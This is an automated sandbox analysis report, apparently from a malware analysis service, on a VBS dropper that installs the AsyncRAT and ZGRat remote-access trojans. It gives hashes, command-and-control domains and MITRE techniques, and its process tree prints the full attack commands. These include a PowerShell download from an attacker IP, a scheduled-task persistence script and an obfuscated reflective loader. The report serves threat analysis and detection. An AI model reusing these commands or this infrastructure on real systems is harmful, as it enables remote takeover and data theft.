asyncrat | 4d0f5fe4b3c5d1586c9f82d56d03ebf4335e0c4f0d8d4e4e88b682213b7c5ec8

Analysis

max time kernel
0s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2023, 05:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22122023_1301_Form 1409-12-3D.vbs
Size

549B
MD5

ad550b065107f683e168f51c4c278bd8
SHA1

6ac51c2f24071c4e637c2247bec0a90fe42bbc2b
SHA256

4d0f5fe4b3c5d1586c9f82d56d03ebf4335e0c4f0d8d4e4e88b682213b7c5ec8
SHA512

1e100e8b16bdac3d2c1cbffa7208b48eb50e0fdee78546bdf5a5e60ff18f421e7594169d4583515c0fff93280fb41f419db676a3b326e9a9158ab97ee51214a6

Score

10^/10

asyncrat zgrat default rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://86.48.18.223:666/files/m.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nodejs.org/download/release/v6.17.1/win-x64/node.exe

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Default

nasser.endofinternet.net:6606

nasser.endofinternet.net:7707

nasser.endofinternet.net:8808

nasser.is-found.org:6606

nasser.is-found.org:7707

nasser.is-found.org:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral2/memory/3372-114-0x000001CD76700000-0x000001CD7675E000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/1272-116-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1712	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1712	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1092 wrote to memory of 1712	1092	WScript.exe	23
PID 1092 wrote to memory of 1712	1092	WScript.exe	23

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\22122023_1301_Form 1409-12-3D.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://86.48.18.223:666/files/m.jpg' -Destination 'C:\Users\Public\ben.zip';Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.vbs"
  2⤵
  PID:224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
1⤵
PID:2080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
1⤵
PID:4216
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"
  2⤵
  PID:1584
- - C:\Users\Public\node.exe
    "C:\Users\Public\node.exe" C:\Users\Public\install.js
    3⤵
    PID:2440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /s /c "powershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);"
      4⤵
      PID:464
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
  2⤵
  PID:4756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
1⤵
PID:220

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" session
1⤵
PID:5008

C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
1⤵
PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
  2⤵
  PID:4160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
    3⤵
    PID:3372
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:1272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);
1⤵
PID:1476

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\app.js"
1⤵
PID:3904
- C:\Users\Public\node.exe
  "C:\Users\Public\node.exe" C:\Users\Public\run.js
  2⤵
  PID:5000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
1⤵
PID:2248
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
  2⤵
  PID:3308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
1⤵
PID:2656

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
e5ab5d093e49058a43f45f317b401e68

SHA1
120da069a87aa9507d2b66c07e368753d3061c2d

SHA256
4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74

SHA512
d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1d867d315a54a1e11270ee8336bc6776

SHA1
e4cb51f7300bdb8039fb943ece5e5c282f6f77d0

SHA256
63913273419e2c74a2a888b0df07468b2030cd137457c8cda1ffb48728a02898

SHA512
732d054529e762740581a5ec00dff7e3b4c6bb8f1824ac07ae7421a0e97a40bbf8dcafd4c285f03783fe3bd47aec6e41dcfdeadae530a469ab5446c51f60bab0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
2KB

MD5
c9431378551c6d63789f4bc499aef072

SHA1
70455c2f065fc4475f1e620defa3c60ed0444399

SHA256
820bdd78e27f4a51dd4e759bac5d52687ec0125978bb8ae90e46e6e6df53f452

SHA512
1e6eadc7fa53883c242a4df34ee2645c617ce26b64d1dbb87f3d532fe7c582bf47ea748a01a524d1441cb1a487abbb098e3c01a4d94b8b98c4793ecfa8a9ca15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c652dc1f72adf89195411e4438f8f00e

SHA1
2bbd11e6b7758649582c3b2c5c90c3571f3cb9d2

SHA256
4e2053a9c17dfdfa0a0ef328f61030d9cda62862ac32532bbf627192d25b5adb

SHA512
3ce060ee6392197823ec0773f45ac3348af9ed4a51e1e221eec163a012df2758cd1429add9de043ba4243ffe3603d4f373ffb430c3b2d50da9b4b924ec2336d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wrixof4r.tum.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Execute.dll

Filesize
56B

MD5
529cf04db0f736467c7583ea80c3aa66

SHA1
7628148337b1d3d700c8151f76a1595b6f5123b8

SHA256
67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520

SHA512
f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

Download Submit
C:\Users\Public\Framework.dll

Filesize
520B

MD5
6a08392ecf95df7fc91917dcfaae8da6

SHA1
480f6a5c761e1a069c0d68f5ac2aabf727791393

SHA256
0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460

SHA512
d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

Download Submit
C:\Users\Public\app.js

Filesize
353B

MD5
a307c4557d5fdf209e1b38a803e03b52

SHA1
14e00c86caadf2ed0949dc7a3f6bffbb5b9cd0fa

SHA256
3a16f15174757a5f84ae743db042b62b2554620118de63be2e7086827f114bf5

SHA512
2c6ad68b4bfe3cd0260712da43a48f1e9b0d60d555be80560a892fb21617061f4efa02c3bb078fb0f02fdd432c48afb88e5f5ec9a05fb82124face2a27a3ac66

Download Submit
C:\Users\Public\basta.vbs

Filesize
320B

MD5
9fefd603b6fb6140195aa07235d20e65

SHA1
40c429e2402f78739497abeb80b8c126b1abb1a1

SHA256
3e8a9bbf93840f6525b7777193834d206ef40c41d9832707cb38051a1dcd59f7

SHA512
a415c64869a3d356fa01860f3e216e38081fd04761b9bd203a902b714437961d385552918a5fe1e5bbd340725f03720ac142a557ce9134dd1cfec66000705bba

Download Submit
C:\Users\Public\install.js

Filesize
796B

MD5
5727e0cb34eac044ea5495b99b7a2f8c

SHA1
6b99de1c9f92718e0053645c2e597d745f23ae34

SHA256
633dc94e7d8e997438a21ac12d05ef1614f7ef8b3df815ea19041880dd0ad8d9

SHA512
300fa4ce3943279b7eff9dd844e8713a1d3a414f6217d881158181440bb187f16715fc494134dc584c826ead713a8d8f9a0f4ff1e17b2b37aef09e88c5ea603b

Download Submit
C:\Users\Public\invoke.dll

Filesize
6B

MD5
b9376e9e3c4d48f5e35a3f355ae1f74a

SHA1
c65605adf5270f5065089b0189da542274d30db0

SHA256
90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9

SHA512
5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

Download Submit
C:\Users\Public\load.dll

Filesize
4B

MD5
f19dbf2edb3a0bd74b0524d960ff21eb

SHA1
ddcb77ff769ea54ca622848f6bedd4004fa4f4fa

SHA256
8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3

SHA512
f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

Download Submit
C:\Users\Public\method.dll

Filesize
9B

MD5
38b97710070dbdd7b3359c0d52da4a72

SHA1
4ce08d2147c514f9c8e1f83d384369ec8986bc3b

SHA256
675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7

SHA512
b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

Download Submit
C:\Users\Public\msg.dll

Filesize
1KB

MD5
75c45bff440212bc78e919d46481f900

SHA1
7da624793681a65c1bb9f33481e2af0095c6ac20

SHA256
76316b8b686494036c4b90d0ec45872cdb4218126d4a0aeb7cfec1657daf5c64

SHA512
53f002572cb533ec3a4c63da2a2035268a86cdba85dafb36d61fdb85d86350402e3141c5a819d762922e71a340a54241f65a2b991b8786ae6e7b9be168447524

Download Submit
C:\Users\Public\node.bat

Filesize
1KB

MD5
2fa62bdf9b72bb14b890a67336ec3e83

SHA1
2a0f4da9ccbbaf8ac81e344360fb4d2c5a535b31

SHA256
f8edd9a15074969f6769874bca3029f2f4403a2f227821639c26062a4c6430c8

SHA512
629f39750f52d8b98372991c65f6735706d6f237794d414780d12b79864112e96882e0a1f60f0c5325e18fe99700d20cb915a38648db2a558d2e0af12979c159

Download Submit
C:\Users\Public\run.js

Filesize
1KB

MD5
6608a57a44d036b837ddafe04c373cc2

SHA1
a8a189b9404300732a18bcb1839233af009b0d91

SHA256
444368271fe7c44add817382426af228bc0f360d79cf97b558b384d88e2505a5

SHA512
fa5c95bcaaba026a64774fb57eb4732e7ec8c9905494459ad60bd57bab9a06ec2be81fa49d7459f5be435365eafaa1919a4a99abd889cd7c980d95edbfb8c42e

Download Submit
C:\Users\Public\runpe.dll

Filesize
29KB

MD5
85c5840c13021d92992b3ff16801441a

SHA1
9a879e35caf963aafa68b93bf54d0c099f4ed559

SHA256
7e750e27a34a9d1e7262939ec68f1cc11d6c835e1cc7b25da4047ea8eb1d789a

SHA512
7777e17728cd1c5a80323417a3e22b249a328008dbf73770e0cc82e6ea7a0157e14352e40bea379fd71fedd049e85610701ab84e9e4fe3b89fe2033d6115546b

Download Submit
C:\Users\Public\shell.js

Filesize
182B

MD5
d71e2d55ee0534b06313f71aefd921b9

SHA1
6c7713299bdcb1cc4046b7612775c24ddf68ad82

SHA256
43bdd5e0b846271a4bae3a4f74c8310b914497abd2ffe0e1886ec9fec9f25ecd

SHA512
6e5f222fa12d4dad713d5e8dd6a443d09ba5f715fa8701b5b26edf0f1ae8204d65eb560b003dfbc5b2f240079dc2c4eb06b9c2245de24338fa9a5c80647eb536

Download Submit
C:\Users\Public\type.dll

Filesize
7B

MD5
be784e48d0174367297b636456c7bcf1

SHA1
8c906d9e0e2439238b3263e087aee3d98fa86dea

SHA256
510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136

SHA512
aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

Download Submit
C:\Users\Public\xx.dll

Filesize
72B

MD5
14c2a6b7bf15e15d8dae9cd4a56432d5

SHA1
0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016

SHA256
79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96

SHA512
e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d

Download Submit
memory/1272-121-0x0000000074880000-0x0000000075030000-memory.dmp

Filesize
7.7MB

Download
memory/1272-116-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1272-128-0x0000000005570000-0x0000000005580000-memory.dmp

Filesize
64KB

Download
memory/1272-127-0x0000000074880000-0x0000000075030000-memory.dmp

Filesize
7.7MB

Download
memory/1272-125-0x0000000006520000-0x00000000065BC000-memory.dmp

Filesize
624KB

Download
memory/1272-126-0x00000000065C0000-0x0000000006626000-memory.dmp

Filesize
408KB

Download
memory/1272-124-0x0000000005910000-0x000000000591A000-memory.dmp

Filesize
40KB

Download
memory/1272-122-0x0000000005D30000-0x00000000062D4000-memory.dmp

Filesize
5.6MB

Download
memory/1272-123-0x0000000005920000-0x00000000059B2000-memory.dmp

Filesize
584KB

Download
memory/1476-97-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/1476-100-0x000002BD0AB50000-0x000002BD0AB60000-memory.dmp

Filesize
64KB

Download
memory/1476-99-0x000002BD0AB50000-0x000002BD0AB60000-memory.dmp

Filesize
64KB

Download
memory/1476-112-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/1712-17-0x000001DE1CA30000-0x000001DE1CA42000-memory.dmp

Filesize
72KB

Download
memory/1712-10-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/1712-11-0x000001DE1BA60000-0x000001DE1BA70000-memory.dmp

Filesize
64KB

Download
memory/1712-16-0x000001DE1BA60000-0x000001DE1BA70000-memory.dmp

Filesize
64KB

Download
memory/1712-12-0x000001DE1BA60000-0x000001DE1BA70000-memory.dmp

Filesize
64KB

Download
memory/1712-14-0x000001DE1C7A0000-0x000001DE1C7B4000-memory.dmp

Filesize
80KB

Download
memory/1712-51-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/1712-15-0x000001DE1BA60000-0x000001DE1BA70000-memory.dmp

Filesize
64KB

Download
memory/1712-13-0x000001DE1C750000-0x000001DE1C776000-memory.dmp

Filesize
152KB

Download
memory/1712-18-0x000001DE1CA20000-0x000001DE1CA2A000-memory.dmp

Filesize
40KB

Download
memory/1712-5-0x000001DE1C4C0000-0x000001DE1C4E2000-memory.dmp

Filesize
136KB

Download
memory/2080-67-0x000001EC7F030000-0x000001EC7F056000-memory.dmp

Filesize
152KB

Download
memory/2080-69-0x000001EC7F0D0000-0x000001EC7F0E0000-memory.dmp

Filesize
64KB

Download
memory/2080-65-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/2080-66-0x000001EC7F0D0000-0x000001EC7F0E0000-memory.dmp

Filesize
64KB

Download
memory/2080-70-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/2248-142-0x00000214BF550000-0x00000214BF560000-memory.dmp

Filesize
64KB

Download
memory/2248-143-0x00000214BF550000-0x00000214BF560000-memory.dmp

Filesize
64KB

Download
memory/2248-141-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/2248-144-0x00000214BF550000-0x00000214BF560000-memory.dmp

Filesize
64KB

Download
memory/2248-149-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/3308-148-0x0000000074880000-0x0000000075030000-memory.dmp

Filesize
7.7MB

Download
memory/3308-150-0x00000000056B0000-0x00000000056C0000-memory.dmp

Filesize
64KB

Download
memory/3308-152-0x0000000074880000-0x0000000075030000-memory.dmp

Filesize
7.7MB

Download
memory/3372-96-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/3372-120-0x00007FFA8B6B0000-0x00007FFA8C171000-memory.dmp

Filesize
10.8MB

Download
memory/3372-115-0x000001CD75A40000-0x000001CD75A50000-memory.dmp

Filesize
64KB

Download
memory/3372-114-0x000001CD76700000-0x000001CD7675E000-memory.dmp

Filesize
376KB

Download
memory/3372-98-0x000001CD75A40000-0x000001CD75A50000-memory.dmp

Filesize
64KB

Download